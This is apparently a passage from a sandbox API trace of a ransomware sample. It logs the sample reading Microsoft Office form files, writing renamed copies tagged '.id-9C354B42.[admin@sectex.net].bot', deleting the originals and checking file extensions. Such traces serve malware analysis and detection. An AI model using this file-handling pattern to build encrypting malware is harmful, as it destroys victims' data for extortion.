	[0160.050] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3d0, lpOverlapped=0x0) returned 1
	[0160.051] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.051] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.051] SetEndOfFile (hFile=0x3c0) returned 1
	[0160.439] CloseHandle (hObject=0x3c0) returned 1
	[0160.478] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.478] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.701] CloseHandle (hObject=0x3d0) returned 1
	[0160.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.786] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg")) returned 1
	[0160.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.787] lstrlenW (lpString=".doc") returned 4
	[0160.787] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.787] lstrlenW (lpString=".docx") returned 5
	[0160.787] lstrcmpiW (lpString1=".docx", lpString2="Y.CFG") returned -1
	[0160.787] lstrlenW (lpString=".pdf") returned 4
	[0160.787] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.787] lstrlenW (lpString=".xls") returned 4
	[0160.787] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.787] lstrlenW (lpString=".xlsx") returned 5
	[0160.787] lstrcmpiW (lpString1=".xlsx", lpString2="Y.CFG") returned -1
	[0160.787] lstrlenW (lpString=".ppt") returned 4
	[0160.787] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.787] lstrlenW (lpString=".zip") returned 4
	[0160.787] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.787] lstrlenW (lpString=".rar") returned 4
	[0160.787] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.787] lstrlenW (lpString=".bz2") returned 4
	[0160.787] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.787] lstrlenW (lpString=".7z") returned 3
	[0160.787] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.788] lstrlenW (lpString=".dbf") returned 4
	[0160.788] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.788] lstrlenW (lpString=".1cd") returned 4
	[0160.788] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.788] lstrlenW (lpString=".jpg") returned 4
	[0160.788] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.788] lstrlenW (lpString=".doc") returned 4
	[0160.788] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString=".docx") returned 5
	[0160.788] lstrcmpiW (lpString1=".docx", lpString2="Y.CFG") returned -1
	[0160.788] lstrlenW (lpString=".pdf") returned 4
	[0160.788] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString=".xls") returned 4
	[0160.788] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString=".xlsx") returned 5
	[0160.788] lstrcmpiW (lpString1=".xlsx", lpString2="Y.CFG") returned -1
	[0160.788] lstrlenW (lpString=".ppt") returned 4
	[0160.788] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.788] lstrlenW (lpString=".zip") returned 4
	[0160.788] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString=".rar") returned 4
	[0160.788] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.788] lstrlenW (lpString=".bz2") returned 4
	[0160.788] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.788] lstrlenW (lpString=".7z") returned 3
	[0160.788] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.789] lstrlenW (lpString=".dbf") returned 4
	[0160.789] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.789] lstrlenW (lpString=".1cd") returned 4
	[0160.789] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG") returned 66
	[0160.789] lstrlenW (lpString=".jpg") returned 4
	[0160.789] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.789] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.789] lstrlenW (lpString="EXITEM.CFG") returned 10
	[0160.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.789] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=838) returned 1
	[0160.790] CloseHandle (hObject=0x388) returned 1
	[0160.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg")) returned 0x20
	[0160.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.790] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.790] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0160.791] GetLastError () returned 0x0
	[0160.791] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x346, lpOverlapped=0x0) returned 1
	[0160.800] WriteFile (in: hFile=0x1b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x350, lpOverlapped=0x0) returned 1
	[0160.801] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.801] WriteFile (in: hFile=0x1b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0160.801] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.811] CloseHandle (hObject=0x1b4) returned 1
	[0160.811] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.811] SetEndOfFile (hFile=0x388) returned 1
	[0160.844] CloseHandle (hObject=0x388) returned 1
	[0160.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg")) returned 1
	[0160.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.845] lstrlenW (lpString=".doc") returned 4
	[0160.845] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString=".docx") returned 5
	[0160.846] lstrcmpiW (lpString1=".docx", lpString2="M.CFG") returned -1
	[0160.846] lstrlenW (lpString=".pdf") returned 4
	[0160.846] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString=".xls") returned 4
	[0160.846] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString=".xlsx") returned 5
	[0160.846] lstrcmpiW (lpString1=".xlsx", lpString2="M.CFG") returned -1
	[0160.846] lstrlenW (lpString=".ppt") returned 4
	[0160.846] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.846] lstrlenW (lpString=".zip") returned 4
	[0160.846] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString=".rar") returned 4
	[0160.846] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString=".bz2") returned 4
	[0160.846] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.846] lstrlenW (lpString=".7z") returned 3
	[0160.846] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.846] lstrlenW (lpString=".dbf") returned 4
	[0160.846] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.846] lstrlenW (lpString=".1cd") returned 4
	[0160.846] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.846] lstrlenW (lpString=".jpg") returned 4
	[0160.846] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.846] lstrlenW (lpString=".doc") returned 4
	[0160.846] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString=".docx") returned 5
	[0160.847] lstrcmpiW (lpString1=".docx", lpString2="M.CFG") returned -1
	[0160.847] lstrlenW (lpString=".pdf") returned 4
	[0160.847] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString=".xls") returned 4
	[0160.847] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString=".xlsx") returned 5
	[0160.847] lstrcmpiW (lpString1=".xlsx", lpString2="M.CFG") returned -1
	[0160.847] lstrlenW (lpString=".ppt") returned 4
	[0160.847] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.847] lstrlenW (lpString=".zip") returned 4
	[0160.847] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString=".rar") returned 4
	[0160.847] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString=".bz2") returned 4
	[0160.847] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.847] lstrlenW (lpString=".7z") returned 3
	[0160.847] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.847] lstrlenW (lpString=".dbf") returned 4
	[0160.847] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.847] lstrlenW (lpString=".1cd") returned 4
	[0160.847] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG") returned 64
	[0160.847] lstrlenW (lpString=".jpg") returned 4
	[0160.847] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.848] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.848] lstrlenW (lpString="INFOMS.ICO") returned 10
	[0160.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.848] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2998) returned 1
	[0160.848] CloseHandle (hObject=0x388) returned 1
	[0160.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico")) returned 0x20
	[0160.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.849] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.849] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.849] GetLastError () returned 0x0
	[0160.849] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.851] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.852] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.852] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0160.852] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.852] CloseHandle (hObject=0x3d0) returned 1
	[0160.852] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.852] SetEndOfFile (hFile=0x388) returned 1
	[0160.854] CloseHandle (hObject=0x388) returned 1
	[0160.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico")) returned 1
	[0160.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.855] lstrlenW (lpString=".doc") returned 4
	[0160.855] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.855] lstrlenW (lpString=".docx") returned 5
	[0160.855] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.855] lstrlenW (lpString=".pdf") returned 4
	[0160.855] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.855] lstrlenW (lpString=".xls") returned 4
	[0160.855] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.855] lstrlenW (lpString=".xlsx") returned 5
	[0160.855] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.855] lstrlenW (lpString=".ppt") returned 4
	[0160.856] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.856] lstrlenW (lpString=".zip") returned 4
	[0160.856] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.856] lstrlenW (lpString=".rar") returned 4
	[0160.856] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.856] lstrlenW (lpString=".bz2") returned 4
	[0160.856] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.856] lstrlenW (lpString=".7z") returned 3
	[0160.856] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.856] lstrlenW (lpString=".dbf") returned 4
	[0160.856] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.856] lstrlenW (lpString=".1cd") returned 4
	[0160.856] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.856] lstrlenW (lpString=".jpg") returned 4
	[0160.856] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.856] lstrlenW (lpString=".doc") returned 4
	[0160.856] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.856] lstrlenW (lpString=".docx") returned 5
	[0160.856] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.856] lstrlenW (lpString=".pdf") returned 4
	[0160.856] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.856] lstrlenW (lpString=".xls") returned 4
	[0160.856] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.856] lstrlenW (lpString=".xlsx") returned 5
	[0160.856] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.857] lstrlenW (lpString=".ppt") returned 4
	[0160.857] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.857] lstrlenW (lpString=".zip") returned 4
	[0160.857] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.857] lstrlenW (lpString=".rar") returned 4
	[0160.857] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.857] lstrlenW (lpString=".bz2") returned 4
	[0160.857] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.857] lstrlenW (lpString=".7z") returned 3
	[0160.857] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.857] lstrlenW (lpString=".dbf") returned 4
	[0160.857] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.857] lstrlenW (lpString=".1cd") returned 4
	[0160.857] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO") returned 64
	[0160.857] lstrlenW (lpString=".jpg") returned 4
	[0160.857] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.857] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.857] lstrlenW (lpString="IPM.CFG") returned 7
	[0160.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.858] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=795) returned 1
	[0160.858] CloseHandle (hObject=0x388) returned 1
	[0160.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg")) returned 0x20
	[0160.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.858] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.858] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.860] GetLastError () returned 0x0
	[0160.860] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x31b, lpOverlapped=0x0) returned 1
	[0160.861] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x320, lpOverlapped=0x0) returned 1
